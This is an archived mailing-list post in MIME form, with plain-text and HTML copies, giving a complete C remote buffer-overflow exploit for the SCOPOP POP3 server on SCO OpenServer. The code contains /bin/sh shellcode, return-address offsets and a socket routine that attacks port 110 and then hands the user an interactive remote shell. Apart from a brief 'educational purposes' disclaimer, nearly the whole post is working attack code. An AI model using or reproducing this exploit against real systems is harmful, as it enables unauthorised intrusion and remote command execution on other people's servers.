This is a multi-part message in MIME format. ------=_NextPart_000_00FF_01BDAFEE.186CC260 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: quoted-printable Hello. Here is my ( ??:) ) exploit for SCOPOP server.=20 Offset 0 is for version 2.1.4-R3. =20 ASM string was little modified for SCO syscall style. Tested on SCO Open Server 5.0.4. FOR EDUCATIONAL PURPOSES ONLY. ------------------------CUT------------------------- /* * Remote pop exploit for SCO systems. * by glitch of litecrew. * Ripped from Miroslaw Grzybek's code. */ #include <stdio.h> #include <stdlib.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h>=20 #include <netdb.h> #include <sys/errno.h> char *shell=3D "\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17" "\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7e" "\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89" "\xcf\xeb\x01\xff\x63\x61\x62\x62\xeb\x1b\xe8\xc9\xff\xff" "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb" "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa"; #define ADDR 0x80474b4 #define OFFSET 0 #define BUFLEN 1200 char buf[BUFLEN]; int offset=3DOFFSET; int nbytes; int sock; struct sockaddr_in sa; struct hostent *hp; short a; void main (int argc, char *argv[]) { int i; if(argc<2) { printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]); printf("Default offset is 0. It works against SCOPOP = v2.1.4-R3\n"); exit(0); } if(argc>2) offset=3Datoi(argv[2]); memset(buf,0x90,BUFLEN); memcpy(buf+800,shell,strlen(shell)); for(i=3D901;i<BUFLEN-4;i+=3D4) *(int *)&buf[i]=3DADDR+offset; buf[BUFLEN]=3D'\n'; if((hp=3D(struct hostent *)gethostbyname(argv[1]))=3D=3DNULL) { perror("gethostbyname()"); exit(0); } if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("socket()"); exit(0); } sa.sin_family=3DAF_INET; sa.sin_port=3Dhtons(110); memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=3D0) { perror("connect()"); exit(0); } printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); = fflush(stdout); write(sock,buf,strlen(buf)); while(1) { fd_set input; FD_SET(0,&input); FD_SET(sock,&input); if((select(sock+1,&input,NULL,NULL,NULL))<0) { if(errno=3D=3DEINTR) continue; printf("CONNECTION CLOSED...\n"); = fflush(stdout); exit(1); } if(FD_ISSET(sock,&input)) { nbytes=3Dread(sock,buf,BUFLEN); for(i=3D0;i<nbytes;i++) { *(char *)&a=3Dbuf[i]; if ((a!=3D10)&&((a >126) || (a<32)) ){ buf[i]=3D' '; } } write(1,buf,nbytes); } if(FD_ISSET(0,&input)) write(sock,buf,read(0,buf,BUFLEN)); } } -------------------------------CUT---------------------------------------= ------=_NextPart_000_00FF_01BDAFEE.186CC260 Content-Type: text/html; charset="koi8-r" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN"> <HTML> <HEAD> <META content=3Dtext/html;charset=3Dkoi8-r http-equiv=3DContent-Type> <META content=3D'"MSHTML 4.72.3110.7"' name=3DGENERATOR> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT color=3D#000000 size=3D2>Hello.</FONT></DIV> <DIV><FONT color=3D#000000 size=3D2> Here is my ( ??:) = )=20 exploit for SCOPOP server. </FONT></DIV> <DIV><FONT size=3D2>Offset 0 is for version 2.1.4-R3. = </FONT></DIV> <DIV><FONT size=3D2>ASM string was little modified for SCO syscall=20 style.</FONT></DIV> <DIV><FONT size=3D2>Tested on SCO Open Server 5.0.4.</FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT size=3D2>FOR EDUCATIONAL PURPOSES ONLY.</FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT=20 size=3D2>------------------------CUT-------------------------</FONT></DIV= > <DIV><FONT = size=3D2>/*<BR> * Remote=20 pop exploit for SCO=20 systems.<BR> * by glitch = of=20 litecrew.<BR> * = Ripped from=20 Miroslaw Grzybek's code.<BR> */</FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT size=3D2>#include =20 <stdio.h><BR>#include =20 <stdlib.h><BR>#include =20 <sys/time.h><BR>#include = <sys/types.h><BR>#include = =20 <unistd.h><BR>#include =20 <sys/socket.h><BR>#include  = ;=20 <netinet/in.h> = <BR>#include =20 <netdb.h><BR>#include =20 <sys/errno.h></FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT size=3D2>char=20 *shell=3D<BR>"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x= 17"<BR>"\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7= e"<BR>"\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89= "<BR>"\xcf\xeb\x01\xff\x63\x61\x62\x62\xeb\x1b\xe8\xc9\xff\xff&= quot;<BR>"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb&qu= ot;<BR>"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";</FONT></= DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT size=3D2>#define ADDR 0x80474b4<BR>#define OFFSET = 0<BR>#define BUFLEN=20 1200</FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT size=3D2>char =20 buf[BUFLEN];<BR>int =20 offset=3DOFFSET;<BR>int =20 nbytes;<BR>int sock;<BR>struct sockaddr_in = sa;<BR>struct hostent *hp;<BR>short a;<BR>void main (int argc, = char=20 *argv[]) {<BR> int=20 i;<BR> if(argc<2)=20 {<BR> &n= bsp; =20 printf("Usage: %s <IP | HOSTNAME>=20 [offset]\n",argv[0]);<BR> &= nbsp; =20 printf("Default offset is 0. It works against SCOPOP=20 v2.1.4-R3\n");<BR> &n= bsp; =20 exit(0);<BR> =20 }<BR> =20 if(argc>2)<BR> &n= bsp; =20 offset=3Datoi(argv[2]);<BR> =20 memset(buf,0x90,BUFLEN);<BR> =20 memcpy(buf+800,shell,strlen(shell));<BR> &nb= sp; =20 for(i=3D901;i<BUFLEN-4;i+=3D4)<BR> = =20 *(int = *)&buf[i]=3DADDR+offset;<BR>  = ;=20 buf[BUFLEN]=3D'\n';<BR> = if((hp=3D(struct=20 hostent *)gethostbyname(argv[1]))=3D=3DNULL)=20 {<BR> &n= bsp; =20 perror("gethostbyname()");<BR> &nb= sp; =20 exit(0);<BR> =20 }<BR> =20 if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0)=20 {<BR> &n= bsp; =20 perror("socket()");<BR> &nbs= p; =20 exit(0);<BR> =20 }<BR> =20 sa.sin_family=3DAF_INET;<BR> =20 sa.sin_port=3Dhtons(110);<BR> =20 memcpy((char *)&sa.sin_addr,(char=20 *)hp->h_addr,hp->h_length);<BR> = =20 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=3D0)=20 {<BR> &n= bsp; =20 perror("connect()");<BR> &nb= sp; =20 exit(0);<BR> =20 }<BR> printf("CONNECTED = TO %s...=20 SENDING DATA\n",argv[1]);=20 fflush(stdout);<BR> =20 write(sock,buf,strlen(buf));<BR>  = ;=20 while(1)=20 {<BR> &n= bsp; =20 fd_set input;</FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT=20 size=3D2> &nbs= p; =20 FD_SET(0,&input);<BR> = =20 FD_SET(sock,&input);<BR> &nb= sp; =20 if((select(sock+1,&input,NULL,NULL,NULL))<0)=20 {<BR> &n= bsp; =20 if(errno=3D=3DEINTR)=20 continue;<BR> = &= nbsp;=20 printf("CONNECTION CLOSED...\n");=20 fflush(stdout);<BR> = &= nbsp; =20 exit(1);<BR> &= nbsp; =20 }<BR> &n= bsp; =20 if(FD_ISSET(sock,&input))=20 {<BR> &n= bsp; =20 nbytes=3Dread(sock,buf,BUFLEN);<BR> &n= bsp; &nb= sp; =20 for(i=3D0;i<nbytes;i++)=20 {<BR> &n= bsp; &nb= sp; =20 *(char=20 *)&a=3Dbuf[i];<BR> &nb= sp; &nbs= p; =20 if ((a!=3D10)&&((a >126) || (a<32))=20 ){<BR> &= nbsp; &n= bsp; =20 buf[i]=3D'=20 ';<BR> &= nbsp; &n= bsp; =20 }<BR> &n= bsp; &nb= sp;=20 }<BR> &n= bsp; =20 write(1,buf,nbytes);<BR> &= nbsp; =20 }<BR> &n= bsp; =20 if(FD_ISSET(0,&input))<BR> &= nbsp; &n= bsp; =20 write(sock,buf,read(0,buf,BUFLEN));<BR> &nbs= p; =20 }<BR>}</FONT></DIV> <DIV><FONT=20 size=3D2>-------------------------------CUT------------------------------= ---------<BR></FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV> </DIV></BODY></HTML> ------=_NextPart_000_00FF_01BDAFEE.186CC260--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:04:34 PDT